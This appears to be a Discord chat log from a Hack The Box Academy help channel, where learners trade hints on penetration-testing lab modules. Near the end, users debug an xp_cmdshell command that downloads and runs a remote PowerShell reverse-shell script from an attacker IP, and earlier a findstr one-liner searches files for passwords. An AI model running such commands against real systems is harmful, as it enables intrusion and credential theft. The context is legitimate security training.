In which module do I see that?

At the 2nd assessment of Brute Forcing they refer to an employee name you already know, do they refer to the username used in the previous skill assessment to login into the admin page?

Nvm, got it!

That threw me off lol

This might help you
|| https://github.com/ihebski/DefaultCreds-cheat-sheet ||

Hi, can somebody help with the last task in Login Brute Forcing?

this one?

Once you are in, you should find that another user exists in server. Try to brute force their login, and get their flag.

Anyone here got a sec to validate something on shells and payloads?

I think I know the right exploit its just not where the hint referred me to

Yes

Anyone knows where can I find the commands to use with mssqlclient.py?!?

Just a quick question does the answer to this section require tunneling or pivoting by any chance?

@rustic sage no

I just got the correct answer, finally. But i found out by just typing in all the possible answers from the list Bunny gave me. But i doubt that was the right way to do it. I tried hydra -C ... But that didnt work. I also couldn't find an open port for MySQL.

Now i got the right answer by luck, nothing more. But i don't know what I missed and what i was supposed to learn from this and how this will help me in the future.

Anybody have a nudge for the hard lab for NMAP enumeration?

Hint is oh so confusing on what it wants from me.

Default passwords are often still used. It makes sense to simply try out a few default passwords.

Okay. I though I was supposed the use Hydra -C user_pass.list MySQL://target, but maybe I assumed wrong.

I also assumed there was a connection with the previous credentials, because of the question. But apparently I was mistaken.

Yes, this lesson is not about Hydra, but about standard passwords and how to get them.

Okay, got it. I was completely thrown off by the way the question was formulated and the information given about Hydra -C in that section, lol. Good to know. This one absolutely had me pulling my hair out.

Ooo. I see you passed CPTS. Was that recent or did your role just take a bit to update?

I got the role very quickly.

Nice. Congrats on passing!

Today I got the certificate, asked the admin if I could get the role and shortly afterwards I got the role.

Thanks

I hope to be there soon

@acoustic owl congratulations 🎊 👏 💐 🥳 🙌

Thanks

@acoustic owl nice job

how many days did you need?

Congrats @acoustic owl

2x 10 days

long journey

What happened with parrot terminal showing our own IP?

You need it so often, and it was handy to have there, why is it gone ?

like so:

Hello, I downloaded and connected to the vpn and I'm able to do a ping and a nmap of the target machine
But i can't acces the webpage that it have can somebody help me?

I'm trying with Photobomb

@acoustic owl how many days did u study for the test? Any tips?

Is the page perhaps running on a different port?
The best thing to do is to ask in the right channel #boxes

I don't know, I never looked at the time.
I started about 1.5 years ago.

I see, i guess that is how long i need to study too then :p. Just started academy two days ago. Just did linux fundamentels and doing mac OS rn.

Does anyone know if there is a way to link my academy profile to discord?

Its the default port, but it shows this message

If that address is correct, here are three other things you can try:

Try again later.
Check your network connection.
If you are connected but behind a firewall, check that Firefox has permission to access the Web.

I think i have to verify my account to see #boxes

Yes, you have to verify your Account

what is the best way to find a password in .txt file using a cmd oneliner?

grep

recursively? for the hole C: AND I have to change the directory

Hi, can somebody help with the last task in Login Brute Forcing?

I am doing Attacking SMB section under the Attacking Services Modules, I have found the share but do not access to get the contents of the share. I have tried bruteforcing with the user jason and robin, to know success withcrackmapexec.

Unsure what to do here

Grep "pattern" C:\\*

and for windows?

?

I'm not familiar with the text commands for windows

Can someone help me with Session Hijacking in XSS Module?

cd C:\ & cd & findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
guess this one does work

Why not .* After "password"

/C:string Uses specified string as a literal search string.

Well yes, I just mean when specifying the file type

good question but I guess you want to reduce the noise

Cheers!
I am working on AD Enumeration & Attack - Skills Assessment Part II. I am trying to answer question 4, but I just dont get it. I|| created a userlist and got quite a lot of usernames with two letters and 3 numbers. I also sprayed all those users with the password I found for the first user against every machine, with no luck. Using rockyou came to mind, did it for around 15 minutes, but the progress is quite slow.|| I would appreciated any nudges.

Try some common passwords that were mentioned in the password spraying section

Hi. I'm stuck at:
https://academy.hackthebox.com/module/80/section/777

||I identified that I need to use: Uppercase/Lowercase/Numbers, I used the :upper: :lower: :digit: regex which gave me 5 passwords. They don't work. What am I doing wrong. Any nudge would help!||

i used sed for this module

Alright thanks I'm going to find out what that is and give it a try!

Can someone knows about that error? I tried both with and without -smb2 options.

also, if you have a excel spreadsheet handy, making a tried passwords (lower,upper, etc.) helps too

looks like there's an issue with direct connection to the target

can you ping it? can you access the service?

Ah that's smart, I'll try that too, thanks

I can join the target yes, I can't ping it, but I can join it

what do you mean by join? If you can't ping the box how do you want to relay to it? that doesn't make sense

Hi everyone. Today, after finishing the Information Security Foundations skill path, I'm beginning with the Penetration Tester job path and I'm looking for a study partner, if anyone is interested feel free to dm me 🙂

what kind of testing are you doing to do? 😄

When I finish with the Job path I would like to do the CPTS

the job path? 😮 is that an academy thing? i though you were talking about doing a real pentesting job 😄

yes, it's an academy "job path"

Penetration tester Job path

can someone tell me how to fix this "Match file name by removing repeated file extension [example .accdb] then re-upload."!?

Can I DM you?

yea

what's it related to?

A file i'm trying to upload to SAM Cengage from Access.

But idk how to remove the repeated file....

i have no clue what any of those words mean 😄

I may need a hint with the Windows Privilege Assessment Part 1.
Question: "Find the password for the ldapadmin account somewhere on the system."

I just can't find it.
I skipped it and I am already NT Authority\System but still cant find it

Lmao Cengage is a website for college students

SAM is also a website that we turn our work into..

so there's no connection to the htb academy?

dumped users?

I don't think so

why are you asking here then omg? 😄

hello, do you have some crack for sale?

Hi! Guys, I’ve been taking the course for pentesting, and I’ve been trying to scan the ip in the course, but must of the time, it said that the host is down. I have tried connecting to the academy vpn and everything, but it doesn’t work anyway, any idea of what happening ? 🤔

-_- nu

is the IP public or private?

Just thought one of you knew how to delete repeated file

I mean, I think the ip is public,

then VPN is not needed, meaning you can scan anything in the internet. If it's something like 10.10.x.y then it's private. https://en.wikipedia.org/wiki/Private_network

I’ll check that, thank you 🙏🏾

checking the ip example that you are giving me, it seems that the ip that I am trying to scan is private.

Hi I need some help with module/116/section/1512 I cant seem to get the subbrute to get the DNS that includes the flag? I put the target ip in etc/hosts as "ip ns1.inlanefreight.htb"

any suggestions

vpn is needed then. If your vpn works fine, then use -Pn with nmap

thx

Good morning guys

Anyone awake now?

lol

What's funny now:>?

I need help with the Academy please

what is it?

Wow man, I must be doing something stupid here. I have used all the lists now from the Usernames directory, except the xato ones... and still no hits.

I am currently in the Linux Fundental module tho.

ok

I don't this queation" What is the path to the htb-student's mail?

I've been checking every content i the directory but there's nothing found there

Got an idea with the user's mail path??

/mail/

Up to AD enumeration and attacks. Here we go

I've started my CPTS journey and seem to have run into snag. I'm probably over thinking this but having trouble determining service version in Firewall and IDS/IPS Evasion - Hard Lab, I think ive figured out which port but cant seem to get the service version

Have you tried connecting to it?

yeah get a timeout

Strange

Stuck on Attacking Email Services. I've grabbed the creds and just need to login to read the emails... connecting to imap server via curl isn't working and telnet/nc arent useful here....(right??) ...Please help lol @.@

There is just the IMAP connection type...

That is taught in the module

Or you can be big brain and use an email client

Evolution FTW.

0.0 Am I Blind~~~? lol

gonna try spinning up the cloud pwnbox provided, maybe a vpn issue

Lol heard, ill break down and read evo Docs, i got away with curl for so long haha

thank you

I mean, it's not required, but I find it easier/quicker to visually work my way through a mailbox rather than interacting with IMAP/POP over the CLI.

^

i must have the wrong port getting a timeout in the cloud box as well

DM me the ports you see and the port you're trying?

can someone help me with " submit root flag " on dashboard

you should probably change your discord username to be taggable per the #rules :)

uhmm, sure, and can you help me ?

I'm looking for someone that is done with the Crackmapexec module 🙂

is dashboard a box? if so your question is better asked in #boxes ; if you cannot see that channel; then you can verify your htb account in #bot-commands

Is anyone able to assist me with the Footprinting Module and the DNS section. I've been stuck on the last question for the longest time. Attempting several different brute forces from the dig transfers.

is that the one with the "x.x.x.203"?

yeah

subdomains of subdomains, and may need a more ferocious wordlist ;)

Ill give that a shot. I've been trying so many variations for this lol.

the word list is in the dns discovery lists in seclists

if that helps narrow it down

Yeah 🙂

Ill give it a shot ❤️

but remember the subdomains you found can have their own subdomains

and technically i don't think there's a limit to how many subdomains there are like a.b.c.e.f.g.h.i.j.k.example.com

Thats even more fun haha

but you don't need to really go that far with the right wordlist

just a thing you may see in other examples of like an admin.whatever.other.subdomain.example.com

Just curious. When you are using dnsenum, the IP that you use is it the original IP of the target IP or is it the one you find after zone transfers.

tysm for your help

you still use the original IP iirc

Okay. That may save me some time.

yep; it's just changing from the inlanefreight.htb to subdomain.inlanefreight.htb

ah okay, that makes more sense. Thank you 🙂

and of course; the right wordlist, because the top lists will not have it

For anyone struggling with Attacking Common Services - Medium, there's actually 6 open ports. Had to reset the target a few time to get more result.

thanks

did try it to but only got 4

@twin vine should it work to find all ports with a normal nmap scan? or does it want -p-

Don't know why -p- doesn't work every time.

Well some of the packages you are sending might drop or the one coming back

Hi! I'm from Poland. I don't know anything about hacking, but I'd like to learn about the API. because there is such an application as ,,żabka,, and there are points to collect in it. apparently yes can be added to the application using the API. if he would like to help the cat, I would be grateful 😅

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

as far as API not much we can help on that

This really isn't the place to ask for this assistance; please read #welcome ; as this channel is for assistance with modules found on https://academy.hackthebox.com ; to access other channels you will need to verify your hack the box account ( https://www.hackthebox.com ) I understand you found this server through searching "hacking" on the search - but if you read #welcome it should tell you what this server is about

Okay thanks ❤️

IF YOUVE DONE ACTIVE DIRECTORY SKILLS PLEASE DM ME ILL GIVE U TACO FLAVORED KIIIISSSSSES

oops sry for caps

clam it down sir

lol

sometimes that do be how it is

did you got the answers yet? because i've got the same problem

make sure you have ssh'd into the target

already did that but still can't find the user's mail path

okay, then try to use the find command

also you can check the environment variables

Got it, appreciate the help. Thanks!

Wow, was not easy but I did it 🤣

Great work!

Thanks

For anyone struggling with CME not working due to a TypeError in aardwolf:

...
TypeError: unsupported operand type(s) for |: 'type' and 'type'

Please apply the following patch:
https://github.com/skelsec/aardwolf/pull/10

Hello! i have the same problem, can you help me?

I'll take a look

Good morning from Europeeee

Anyone working with attacking DNS!

I started that earlier today... it's a whopper of a module! Good job. I'm 1/3 of the way through.

Hey Guys, How can i build Snaffler.exe or Rubeus.exe

wehn i download the Github Repos there are no exe files and no explaination how to install/build it.

https://github.com/SnaffCon/Snaffler/releases

Good luck

https://github.com/r3motecontrol/Ghostpack-CompiledBinaries

Thank you!

ON PIVOTING, TUNNELING, AND PORT FORWARDING module
Skills Assessment

how do i transfer the lsass back to my attack host

the --local-auth requirement in the SMB attacking common services had me pulling my hair out lol

I still don't really understand that flag. Is it for accounts you are trying to log into that aren't domain connected? If I get account creds I usually just try both now to see if any work

as i now believe i understand it, we were trying to brute-force his local host creds not his domain creds

I used impacket's smbserver...pay attention to file permissions too or else the transfer will fail

the problem with little parameters missing off brute-forcing is that you always assume your wordlist is wrong not your command 😛

yes, i noticed that.. i tried transfering the folder but it fails

Yeah I'm pretty sure you'll only need the dump. It should be faster that way too

what permission should be given

I just gave Full Control for the account. You should also look at the sharing permissions too if you plan to use the SMB server method

you might need to use -smb2support also?

Yeah, good catch, that option is helpful for setting up the smb server

are you working through the job path Gate?

yeah, i did the transfer but i think i'm missing something.. it says No Module named impacket

Okay seems like you're getting there...you might not have impacket tools though

pip install impacket

it works well, when i run python smbserver.py on my local host

oh okay good

but when i transfer it to the linux machine.. it doesn't

about to start the AD enumeration and attacks module, better grab a few litres of red bull

There are a few ways of connecting to a hosted smb server from a windows machine. The way I described above was my method of file transfer for that section but there are many ways that may work better for you. Check out https://lolbas-project.github.io/ and search /upload to find some built-in binaries for upload

Hello, anyone working around the attacking DNS module?!?!

there is no module like that

it is a section from some module prob. but I dont remember. Be more spesific

Yeap, it`s from the attacking common services module!

Im using the tool subbrute but I cant make it work 😦

ohh

I had also problems with that part

what did you done so far?

Im going through many different names in the resolvers.txt file but doesnt find anything....

have you add the ip and domain name to the /etc/hosts

I have tried that but now I realize maybe I did it with .com instead of .htb

I will try that...

you should add that it doesnt work otherwise. If it is .htb you definitely need to add that

I am working on attacking common services hard and trying to get a reverseshell through cmdshell. Can someone help me with my syntax. I am sure there are other ways to get the flag, but i want to test this out.|| EXECUTE ('xp_cmdshell ''powershell IEX-New-Object Net.webclient).downloadString('http://10.10.14.10.2/rev1.ps1')'')') AT [LOCAL.TEST.LINKED.SRV]||

yeah I hate that part

I`m not there yet 😦 😦 Hopefully in the weekend I can start working on those labs!

you need to go slowly and add " everytime it says there is problem

hahaha

a better image

i got others to work, just all the ' within the command is messing me up lol

Now it takes forever and only finds 1 extra domain....

is there something with the ns1.inlafreight.htb that I need to change...

there are 2 ( and there are 4 ) . I mean comm onnn hahahaha

i am shitty as SQL lol be nice

Yeah I was feeling the same. hahah

do you mind DMing me an example

well I wasnt go crazy like you. My commands were pretty simple

hahaha

like this

EXECUTE('xp_cmdshell ''dir C:\users''') AT [local.test.linked.srv]

yeah i just want to see if i can get a reverseshell

thats another one works

EXECUTE('sp_configure ''xp_cmdshell'', ''1''') AT [local.test.linked.srv]

you need to put more ' and fix paranthesis issue

It is pretty slow, unfortunately 😦

yeah i have tried many different combinations and cant get it 😦

but it gives you an error saying this part have problem

it should guide you

Ok... 🙂

1> EXECUTE ('xp_cmdshell (''powershell IEX-New-Object Net.webclient).downloadString('''http://10.10.14.10.2/rev1.ps1''')'')') AT [LOCAL.TEST.LINKED.SRV]
2> go
Msg 102, Level 15, State 1
Server 'WIN-HARD\SQLEXPRESS', Line 1
Incorrect syntax near 'http:'.

You have five instead of four octets in your .downloadString.

ooo shit thanks

If you wanna make your life easier you can use certutil to do the download and drop the file to disk. Then execute it in a second command

It's not going to play nice with you using single quotes in the powershell command